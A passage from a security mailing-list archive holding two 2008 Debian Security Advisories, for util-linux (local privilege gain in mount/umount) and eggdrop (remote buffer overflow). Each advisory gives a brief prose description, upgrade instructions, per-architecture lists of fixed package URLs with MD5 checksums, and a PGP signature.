For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf51xwM/Gs81MDZ0RAjqiAJ4tp4GU4o4xUEs1IVlt2h82CSnoCQCgn3IJ
+fQurSEpAkrAOu7UiYpmoWM=
=dJ1n
-----END PGP SIGNATURE-----



From skx at debian.org  Sat Jan  5 15:10:06 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 15:10:06 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1450-1] New util-linux packages
	fix programming error
Message-ID: <20080105151006.GB19854@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1450-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : util-linux
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-5191
Debian Bug     : XXX


It was discovered that util-linux, Miscellaneous system utilities, didn't
drop privileged users and groups in the correct order in the mount and
umount commands.  This could potentially allow a local user to gain
additional privileges.

For the stable distribution (etch), this problem has been fixed in version
2.12r-19etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 2.12p-4sarge2.

We recommend that you upgrade your util-linux package.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2.dsc
    Size/MD5 checksum:      712 c16f823e59f4e6e844abb42a5d0d74c5
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2.diff.gz
    Size/MD5 checksum:    74396 9e13a2463ef33b2bd1596072742f8da8
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p.orig.tar.gz
    Size/MD5 checksum:  2001658 d47e820f6880c21c8b4c0c7e8a7376cc

Architecture independent packages:

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux-locales_2.12p-4sarge2_all.deb
    Size/MD5 checksum:  1070176 a6404671c68d7f06a9da77b1dafc7a42

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_alpha.deb
    Size/MD5 checksum:   440162 5d79ed3df525038d07eee80e2872e625
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_alpha.deb
    Size/MD5 checksum:   161046 c8f09ca56ba1d2e557ca8c730b02585e
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_alpha.deb
    Size/MD5 checksum:    69054 6b36255a732ac7b3bddb4ed53d202e55
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_alpha.udeb
    Size/MD5 checksum:   563462 dd3b17badda1e17440a29cc29ff439a4

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_arm.deb
    Size/MD5 checksum:   387470 3df157ef832ed95ac9f92ff94383a7f1
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_arm.deb
    Size/MD5 checksum:    65422 c57935c9e9d5e3d9c3bbdda78b0047b1
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_arm.udeb
    Size/MD5 checksum:   548928 c29b3f44c372b9129138d89ab17178a7
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_arm.deb
    Size/MD5 checksum:   136594 6f762a670c52c716ef21b0fdca700447

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_hppa.deb
    Size/MD5 checksum:   423190 d15fcccebc85a5c173eb862eed237cab
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_hppa.udeb
    Size/MD5 checksum:   562828 4b3f69108bacc9f576125d55b450158d
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_hppa.deb
    Size/MD5 checksum:   149524 a7f26a0b62035eb0f395db4a0fb05cf6
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_hppa.deb
    Size/MD5 checksum:    68018 2966417cb1dbb3bd7321e78cf819953b

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_i386.udeb
    Size/MD5 checksum:   541402 f73c85cc3e687ce28163e1ec10aa25e6
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_i386.deb
    Size/MD5 checksum:    65834 198a771b904f201e49d04a0a401f02ea
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_i386.deb
    Size/MD5 checksum:   380538 c2cba4219351e9af5a90e772461d7015
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_i386.deb
    Size/MD5 checksum:   140038 41d4c24fcd78ef78253ffe7d0dceab22

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_ia64.deb
    Size/MD5 checksum:   507372 f5cfadc062f43cada6e6647770df546c
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_ia64.deb
    Size/MD5 checksum:    71636 3271e6449d3d26f3a12a3515b27bc1c6
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_ia64.deb
    Size/MD5 checksum:   174126 4373c2adb44d9db16523f8c544039d9b
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_ia64.udeb
    Size/MD5 checksum:   590718 a6586872cb11870c70ed302cff27edea

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_m68k.deb
    Size/MD5 checksum:   129950 7ec7e58e4e40d17916b5551458302f73
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_m68k.deb
    Size/MD5 checksum:    65646 a72b65b46670259235bde4f4c544e3e5
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_m68k.deb
    Size/MD5 checksum:   242714 7f4281627d1a35a381324181225d1d30

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_mips.deb
    Size/MD5 checksum:   149674 c2112e05a05010002a00ac7aab88c24d
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_mips.deb
    Size/MD5 checksum:   454004 fbfba9ffd81e5bf6e3cddbab79db7010
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_mips.udeb
    Size/MD5 checksum:   562188 df36a1b2bf7e3c139909536cb1cfacc6
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_mips.deb
    Size/MD5 checksum:    71200 d85673c687eae7c73a3f3dde8a0e1d1c

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_mipsel.deb
    Size/MD5 checksum:    71128 11eb8733b74fb60b827e0ee20a665074
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_mipsel.udeb
    Size/MD5 checksum:   560164 09fba084cb3fbadcb3e8dfbe23d9ca00
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_mipsel.deb
    Size/MD5 checksum:   454098 70cf0b01d6c7c8168b67ddca58ac460c
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_mipsel.deb
    Size/MD5 checksum:   150286 225957bd9f3459d8c690a2fb8d5d5c63

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_powerpc.deb
    Size/MD5 checksum:   147524 fa550c13e958cb24c4fc6892721f1774
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_powerpc.udeb
    Size/MD5 checksum:   556382 6c1e157b9d8c50e710e161ff56128fc3
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_powerpc.deb
    Size/MD5 checksum:   406432 240bb6ff7568a9c5431d6e25effd9027
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_powerpc.deb
    Size/MD5 checksum:    66066 c79ecde89a4bca6098631ed3b037f3c0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_s390.deb
    Size/MD5 checksum:   379214 58a06c548c099ecc78844285138a9ef4
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_s390.deb
    Size/MD5 checksum:   145948 f1aa3a82a738a93d244b9efccce0f807
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_s390.udeb
    Size/MD5 checksum:   558122 ca862492d2073e62bd02e0e5035739ad
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_s390.deb
    Size/MD5 checksum:    67214 bd5a4a0caa9633cce62dab9c46b92e68

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12p-4sarge2_sparc.deb
    Size/MD5 checksum:   138374 89cca3fc13c63f2e968868c16b2c8af5
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12p-4sarge2_sparc.deb
    Size/MD5 checksum:   274552 ed37167f7e16d1b5e6aad05a865ed980
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12p-4sarge2_sparc.deb
    Size/MD5 checksum:    65528 fee03f7fa096f9628f1da718ee73c068
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12p-4sarge2_sparc.udeb
    Size/MD5 checksum:    39778 ec743031e4434bf8fac954643bc82a75


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1.dsc
    Size/MD5 checksum:      750 66546d031256054335cee8f1537d497d
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1.diff.gz
    Size/MD5 checksum:   103759 258e5d0be4b6d58da2926840e91f80d8

Architecture independent packages:

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux-locales_2.12r-19etch1_all.deb
    Size/MD5 checksum:  1086256 ba17a075cf0cb2f76c58f6ca0dabc469

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_alpha.udeb
    Size/MD5 checksum:   485430 5914165d8adb198d1c4f20923e77371b
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_alpha.deb
    Size/MD5 checksum:    71118 80416006c0439b5b160308c4cab38cab
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_alpha.deb
    Size/MD5 checksum:   412426 a512bdf2a6e4610368268a48616e2338
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_alpha.deb
    Size/MD5 checksum:   174248 a387863a4533463ea8f76d9fbe28b57b
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_alpha.udeb
    Size/MD5 checksum:    69232 52c3d65dc03c4bb10da3aa8997b40af2

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_amd64.deb
    Size/MD5 checksum:   162824 d2b3d4d6d3ca0aec56e6560831a9de5a
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_amd64.deb
    Size/MD5 checksum:   397324 5f3758c3dfda838c877e6d471cb784ec
  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_amd64.udeb
    Size/MD5 checksum:   485096 7d7eba8ac57dbbaac1ec8ab081e45497
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_amd64.deb
    Size/MD5 checksum:    69764 bc0c5d69fdf2165458c0e7abefdb5fbc
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_amd64.udeb
    Size/MD5 checksum:    64548 0eb480a8aee59e4c620ecb29f63f927c

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_arm.udeb
    Size/MD5 checksum:   486468 516ae37dc6deb7ced1abc66435da14fc
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_arm.udeb
    Size/MD5 checksum:    64652 65150b48c91bf577e0517663b56ac2df
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_arm.deb
    Size/MD5 checksum:    68534 2224d1d73e981dfc975ad738cc734a61
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_arm.deb
    Size/MD5 checksum:   151328 2979a97bed34c836c88abe829802c577
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_arm.deb
    Size/MD5 checksum:   388904 6ec50e18fc8ac5cf410a8bc7ef1a4072

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_hppa.udeb
    Size/MD5 checksum:   490476 ba319f3968b0fa50f531d5467d9efd92
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_hppa.deb
    Size/MD5 checksum:   415696 4ff25eaa541c44da9bf1332fd456b778
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_hppa.udeb
    Size/MD5 checksum:    72070 f059cd88c0752b1d26868a37ffeb76f0
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_hppa.deb
    Size/MD5 checksum:   161262 cd5af93db297ed73c29fb0e724342a1c
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_hppa.deb
    Size/MD5 checksum:    70530 8c5b00fc105b08dd3300c407800fcee3

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_i386.udeb
    Size/MD5 checksum:   483796 42713a8d2bfe66be61c4368f9297282e
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_i386.udeb
    Size/MD5 checksum:    58012 bf4c9b986448f79bde690f364675d45d
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_i386.deb
    Size/MD5 checksum:    68548 446b1ef1d65507eb4bb445b848669497
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_i386.deb
    Size/MD5 checksum:   375214 498d39c18c17337f908cdb64457080fb
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_i386.deb
    Size/MD5 checksum:   157272 c5b1383c8c6fe95fd5344c2e6a20a68f

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_ia64.deb
    Size/MD5 checksum:   481248 df95ef8b6d5425231a4b5a8b83708b9a
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_ia64.deb
    Size/MD5 checksum:    73840 e184768d10c05f735194fea49baf44d7
  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_ia64.udeb
    Size/MD5 checksum:   494036 92f7e3535e7aac8ee7cff08e881daf3b
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_ia64.udeb
    Size/MD5 checksum:    88944 ba2be57ed59074b08f8dfd1ea54d28c5
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_ia64.deb
    Size/MD5 checksum:   189582 588a03342bfe94ddcc6b0731fed7798d

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_mips.deb
    Size/MD5 checksum:   409996 5f1081bd8d61668b018bc2bf566adbee
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_mips.udeb
    Size/MD5 checksum:    70182 3e08af58bacd4b025cd0abc55bbcc469
  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_mips.udeb
    Size/MD5 checksum:   491132 6f717a8be2567569fc699200664c20ab
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_mips.deb
    Size/MD5 checksum:    70404 a575852e3946955cca1ef87089ed3629
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_mips.deb
    Size/MD5 checksum:   165076 3c1ce884e3de89f449886647cf04ae3f

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_mipsel.udeb
    Size/MD5 checksum:   489198 9ad73f874cddbe202a7751a63a123b37
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_mipsel.deb
    Size/MD5 checksum:   409998 8a33bfd57fc03795ab715caeb08f3efd
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_mipsel.udeb
    Size/MD5 checksum:    70354 0317bc2a2bd8234d8199e28bdbb3c50f
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_mipsel.deb
    Size/MD5 checksum:    70302 5de2df205891cc2bc289f3fc226880f4
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_mipsel.deb
    Size/MD5 checksum:   165162 83614488ec6324a29b84df3f26a3808a

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_powerpc.udeb
    Size/MD5 checksum:    64156 5a421d03d607dc2dc850420128f58442
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_powerpc.deb
    Size/MD5 checksum:   393330 b172821b4e84b39350cb31dfbd73e5f3
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_powerpc.deb
    Size/MD5 checksum:    68906 baf6c5742ea1cb223e890645c46131a0
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_powerpc.deb
    Size/MD5 checksum:   158180 c2be00ea526ce53cdb99b269467aa256
  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_powerpc.udeb
    Size/MD5 checksum:   488132 32df2a8c2e258347d30a6d277d73e0fd

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_s390.deb
    Size/MD5 checksum:    70056 cef8b55e97ae2b4c555ed6e2994cac52
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_s390.udeb
    Size/MD5 checksum:    69478 1f1e4d4270624073cefb18ec876e8331
  http://security.debian.org/pool/updates/main/u/util-linux/cfdisk-udeb_2.12r-19etch1_s390.udeb
    Size/MD5 checksum:   489936 5053c8f2b4df8d7e962226599f550575
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_s390.deb
    Size/MD5 checksum:   379524 30d04a68c9dece51e69475de1f6a394f
  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_s390.deb
    Size/MD5 checksum:   159256 5ab3f1a015e0b05a91b4990cfa3b42ca

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/u/util-linux/mount_2.12r-19etch1_sparc.deb
    Size/MD5 checksum:   155194 d7ffcb68840e2c7fa979d8a3fed874fd
  http://security.debian.org/pool/updates/main/u/util-linux/fdisk-udeb_2.12r-19etch1_sparc.udeb
    Size/MD5 checksum:    37474 a66ff5f7a46ca31ec6e5aea486b3b4f6
  http://security.debian.org/pool/updates/main/u/util-linux/util-linux_2.12r-19etch1_sparc.deb
    Size/MD5 checksum:   273878 1edee1ee7a544a06eac0f88c9005bb06
  http://security.debian.org/pool/updates/main/u/util-linux/bsdutils_2.12r-19etch1_sparc.deb
    Size/MD5 checksum:    68566 37bff20df09804ca7d6cfe2d08c9caf5


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf512wM/Gs81MDZ0RAnxhAKCknVGuqTfaC3nirZuVA88LlJ19gQCgtBCH
GD8mJVKbnub7fmdBURXoiQQ=
=AZ6q
-----END PGP SIGNATURE-----



From skx at debian.org  Sat Jan  5 15:11:22 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 15:11:22 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1448-1] New eggdrop packages fix
	execution of arbitrary code
Message-ID: <20080105151122.GA21677@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1448-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : eggdrop
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2807
Debian Bug     : 427157

It was discovered that eggdrop, an advanced IRC robot, was vulnerable
to a buffer overflow which could result in a remote user executing
arbitrary code.

For the stable distribution (etch), this problem has been fixed in version
1.6.18-1etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 1.6.17-3sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.18-1.1.

We recommend that you upgrade your eggdrop package.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1.diff.gz
    Size/MD5 checksum:    36928 cfaa50371d39bd8e2994e37fecc6ff86
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17.orig.tar.gz
    Size/MD5 checksum:  1030413 a0f9befca240072e45cd57908bb819d0
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1.dsc
    Size/MD5 checksum:      651 b3522add4d8a7d6ca05072fa2e733509

Architecture independent packages:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.17-3sarge1_all.deb
    Size/MD5 checksum:   410510 bb84e646defd5d2f29eef07a4bcddc35

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_alpha.deb
    Size/MD5 checksum:   602006 bd5130ad50ff7a265a1a52bccf41ee4e

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_amd64.deb
    Size/MD5 checksum:   535646 67bf2ced5e6c6b7fd36a4f31e0dd563f

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_arm.deb
    Size/MD5 checksum:   494010 03361c7e85a481bf32991fab01ebc544

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_hppa.deb
    Size/MD5 checksum:   594058 a7b7fedc13f8fff6812d02878c8ef871

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_i386.deb
    Size/MD5 checksum:   470438 f3a8dde2d859cbd72cfa8a50ef7c500d

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_ia64.deb
    Size/MD5 checksum:   733390 f5e186d15eb55594c203fc76f03fc6b4

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_m68k.deb
    Size/MD5 checksum:   439430 876fa0049e3eae163c88f4fc21ef3991

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_mips.deb
    Size/MD5 checksum:   514084 8a2c0716911a4f14a79525f4bda97558

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_mipsel.deb
    Size/MD5 checksum:   516766 f9d2046d98a283c253b6bd0890e19a76

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_powerpc.deb
    Size/MD5 checksum:   516616 5e26e11c8cc8248ab55abb047469268d

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_s390.deb
    Size/MD5 checksum:   524026 e1a9c4e11d1ef39a5e9c95fa13b82d36

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_sparc.deb
    Size/MD5 checksum:   496820 f6226930abbc54b1c9f6f12ca16b0c4b


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18.orig.tar.gz
    Size/MD5 checksum:  1025608 c2734a51926bdf0380d8bb53f5a7b2ee
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1.dsc
    Size/MD5 checksum:      642 51a806bb57b49ad48aaf33de7ee68a22
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1.diff.gz
    Size/MD5 checksum:     7735 1a4235a0c37b8ceda4f9a6c7d959caac

Architecture independent packages:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.18-1etch1_all.deb
    Size/MD5 checksum:   412462 68732ebe9e8a2acc3c0f6d014c40117d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_alpha.deb
    Size/MD5 checksum:   596918 34ee4259e293b79c6e070b0d6c674227

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_amd64.deb
    Size/MD5 checksum:   537278 1f50307bb1f23c45a66b2727b7f1def8

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_arm.deb
    Size/MD5 checksum:   498644 9df0fb22c80946159524c92b57427ffe

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_hppa.deb
    Size/MD5 checksum:   599774 1e37281849d63b4094cca6f80231f1df

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_i386.deb
    Size/MD5 checksum:   476308 cd53f77bd94f508fe22891368c7733a5

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_ia64.deb
    Size/MD5 checksum:   755256 3d0786df79f2a112a8ddf2c13b1a25b0

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_mips.deb
    Size/MD5 checksum:   534334 992714b10e468def8d919d374f99b1f1

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_mipsel.deb
    Size/MD5 checksum:   537058 d5a5471f4e5dd41638886c5747820a4f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_powerpc.deb
    Size/MD5 checksum:   522180 9aed03927df0bfd92ce68f1832881cbc

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_s390.deb
    Size/MD5 checksum:   529796 224f6400c4c880fc6534e63ace1d1979

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_sparc.deb
    Size/MD5 checksum:   491240 4c0efbfedc4604ae67edaf8eae2f3229


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf53jwM/Gs81MDZ0RAuuFAKDK4XyGdQkrVYeToN4PvC3mznPZ7gCg3dAl
hXl95QEHEfCBnKiFoB9+fuA=
=6+sY
-----END PGP SIGNATURE-----



From skx at debian.org  Sat Jan  5 14:52:44 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 14:52:44 +0000
